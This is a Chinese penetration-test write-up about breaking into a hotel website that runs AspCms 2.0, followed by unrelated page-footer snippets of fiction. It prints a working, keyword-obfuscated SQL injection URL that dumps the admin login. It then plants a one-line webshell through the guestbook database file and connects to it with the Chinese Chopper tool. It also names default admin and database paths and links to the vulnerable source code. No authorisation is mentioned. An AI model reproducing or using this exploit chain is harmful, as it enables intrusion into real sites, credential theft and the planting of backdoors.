[滲透實(shí)戰(zhàn)]某國(guó)際酒店測(cè)試

這是某個(gè)國(guó)際酒店的網(wǎng)站,由于使用了AspCms 2.0修赞,通過SQL注入我們很快可以拿下shell

此次測(cè)試中杆融,由于網(wǎng)站限制了所有的讀寫權(quán)限,由各種錯(cuò)誤唆樊,以及最后的小馬根本沒什么權(quán)限宛琅。

0x01 基礎(chǔ)信息:

簡(jiǎn)單看看指紋信息:

是ASPCMS的,通過一個(gè)通用SQL注入拿到管理員的賬號(hào)密碼:

EXP:

https://blog.dyboy.cn/plug/comment
/commentList.asp?id=0%20unmasterion%20
semasterlect%20top%201%20UserID,GroupID,
LoginName,Password,now%28%29,null,1%20%20
frmasterom%20%7bprefix%7duser

利用EXP直接獲得:

解密得到管理員

賬號(hào):admin

密碼:123456

0x02 深入測(cè)試:

后臺(tái)默認(rèn)為: https://blog.dyboy.cn/admin_aspcms/

登陸管理后臺(tái)

根據(jù)以前的添加模版的方法不可行逗旁,再多看幾下嘿辟,發(fā)現(xiàn)整個(gè)網(wǎng)站是沒有寫入權(quán)限的...

這里要提一個(gè)東西就是aspcms默認(rèn)的留言板數(shù)據(jù)庫(kù)路徑:
https://blog.dyboy.cn/data/data.asp

有的我們?cè)诹粞园辶粞砸痪湓?/p>

┼攠數(shù)畣整爠煥敵瑳∨≡┩愾
密碼:a
菜刀連接 https://blog.dyboy.cn/data/data.asp 即可

因?yàn)檎麄€(gè)網(wǎng)站都沒有寫的權(quán)限舆瘪,應(yīng)該這個(gè)網(wǎng)站之前就有被入侵的經(jīng)歷吧,所以做了限制红伦,找到備份文件的地方英古,嘗試了一下,雖然顯示成功備份昙读,事實(shí)上不能備份召调。

因?yàn)椴荒苤苯酉螺d備份文件,就直接訪問備份文件蛮浑,發(fā)現(xiàn)一個(gè)有趣的東西:

有一個(gè) execute 語句唠叛,大家應(yīng)該有所想法的

然后死馬當(dāng)活馬醫(yī),直接菜刀鏈接備份數(shù)據(jù)庫(kù)文件沮稚,猜測(cè)密碼為a艺沼,因?yàn)閿?shù)據(jù)庫(kù)文件比較大,所以每次的操作都會(huì)消耗較長(zhǎng)的時(shí)間

然后就這么就連上了...

前面也說了整個(gè)網(wǎng)站都沒權(quán)限壮虫,雞肋shell一個(gè)澳厢。

0x03 總結(jié):

shell是否有權(quán)限不重要环础,aspcms的都可以這么黑盒測(cè)試

提供一下這個(gè) ASPcms 2.0 的源碼下載地址:

http://down.admin5.com/asp/73162.html

空閑有能力的朋友可以審計(jì)一下囚似,ASP的我就會(huì)一句話[捂臉]...

原文地址: https://blog.dyboy.cn/websecurity/49.html

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市线得,隨后出現(xiàn)的幾起案子饶唤,更是在濱河造成了極大的恐慌,老刑警劉巖贯钩,帶你破解...
    沈念sama閱讀 211,743評(píng)論 6 492
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件募狂,死亡現(xiàn)場(chǎng)離奇詭異,居然都是意外死亡角雷,警方通過查閱死者的電腦和手機(jī)祸穷,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,296評(píng)論 3 385
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來勺三,“玉大人雷滚,你說我怎么就攤上這事÷鸺幔” “怎么了祈远?”我有些...
    開封第一講書人閱讀 157,285評(píng)論 0 348
  • 文/不壞的土叔 我叫張陵,是天一觀的道長(zhǎng)商源。 經(jīng)常有香客問我车份,道長(zhǎng),這世上最難降的妖魔是什么牡彻? 我笑而不...
    開封第一講書人閱讀 56,485評(píng)論 1 283
  • 正文 為了忘掉前任扫沼,我火速辦了婚禮,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘充甚。我一直安慰自己以政,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 65,581評(píng)論 6 386
  • 文/花漫 我一把揭開白布伴找。 她就那樣靜靜地躺著盈蛮,像睡著了一般。 火紅的嫁衣襯著肌膚如雪技矮。 梳的紋絲不亂的頭發(fā)上抖誉,一...
    開封第一講書人閱讀 49,821評(píng)論 1 290
  • 那天,我揣著相機(jī)與錄音衰倦,去河邊找鬼袒炉。 笑死,一個(gè)胖子當(dāng)著我的面吹牛樊零,可吹牛的內(nèi)容都是我干的我磁。 我是一名探鬼主播,決...
    沈念sama閱讀 38,960評(píng)論 3 408
  • 文/蒼蘭香墨 我猛地睜開眼驻襟,長(zhǎng)吁一口氣:“原來是場(chǎng)噩夢(mèng)啊……” “哼夺艰!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起沉衣,我...
    開封第一講書人閱讀 37,719評(píng)論 0 266
  • 序言:老撾萬榮一對(duì)情侶失蹤郁副,失蹤者是張志新(化名)和其女友劉穎,沒想到半個(gè)月后豌习,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體存谎,經(jīng)...
    沈念sama閱讀 44,186評(píng)論 1 303
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,516評(píng)論 2 327
  • 正文 我和宋清朗相戀三年肥隆,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了既荚。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 38,650評(píng)論 1 340
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡栋艳,死狀恐怖恰聘,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情嘱巾,我是刑警寧澤憨琳,帶...
    沈念sama閱讀 34,329評(píng)論 4 330
  • 正文 年R本政府宣布,位于F島的核電站旬昭,受9級(jí)特大地震影響篙螟,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜问拘,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,936評(píng)論 3 313
  • 文/蒙蒙 一遍略、第九天 我趴在偏房一處隱蔽的房頂上張望惧所。 院中可真熱鬧,春花似錦绪杏、人聲如沸下愈。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,757評(píng)論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽势似。三九已至,卻和暖如春僧著,著一層夾襖步出監(jiān)牢的瞬間履因,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 31,991評(píng)論 1 266
  • 我被黑心中介騙來泰國(guó)打工盹愚, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留栅迄,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 46,370評(píng)論 2 360
  • 正文 我出身青樓皆怕,卻偏偏與公主長(zhǎng)得像毅舆,于是被迫代替她去往敵國(guó)和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子愈腾,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 43,527評(píng)論 2 349

推薦閱讀更多精彩內(nèi)容

  • 一套實(shí)用的滲透測(cè)試崗位面試題憋活,你會(huì)嗎? 1.拿到一個(gè)待檢測(cè)的站顶滩,你覺得應(yīng)該先做什么余掖? 收集信息 whois寸爆、網(wǎng)站源...
    g0閱讀 4,818評(píng)論 0 9
  • 關(guān)于Mongodb的全面總結(jié) MongoDB的內(nèi)部構(gòu)造《MongoDB The Definitive Guide》...
    中v中閱讀 31,912評(píng)論 2 89
  • 背景: 閱讀新聞 12C CDB模式下RMAN備份與恢復(fù) [日期:2016-11-29] 來源:Linux社區(qū) 作...
    陽屯okyepd閱讀 3,362評(píng)論 0 7
  • [SQL注入攻擊] SQL注入攻擊是黑客對(duì)數(shù)據(jù)庫(kù)進(jìn)行攻擊的常用手段之一礁鲁。隨著B/S模式應(yīng)用開發(fā)的發(fā)展,使用這種模式...
    James黃杰閱讀 2,645評(píng)論 0 30
  • 1赁豆、數(shù)學(xué)完成老師布置的第二周作業(yè)仅醇,遇到了難題--最后一題,并在反饋中聆聽老師對(duì)這一題的講解魔种。通過這一次作業(yè)我學(xué)到了...
    謝娜1011閱讀 234評(píng)論 1 0